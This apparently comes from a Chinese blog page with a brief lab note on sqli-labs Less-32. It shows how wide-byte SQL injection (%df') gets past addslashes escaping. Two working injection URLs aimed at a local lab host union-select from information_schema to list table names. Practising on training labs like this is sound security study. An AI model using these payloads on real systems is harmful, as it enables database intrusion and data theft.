【sqli-labs】 less32 GET- Bypass custom filter adding slashes to dangrous chars (GET型转义了'/"字符的宽字节注入)

http://192.168.136.128/sqli-labs-master/Less-32/?id=0%df‘ union select 1,2,3%23

表名

http://192.168.136.128/sqli-labs-master/Less-32/?id=0%df‘ union select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1%23

【sqli-labs】 less32 GET- Bypass custom filter adding slashes to dangrous chars (GET型转义了'/"字符的宽字节注入)

标签：inf   mys   注入   函数   引号   post   tables   table   .com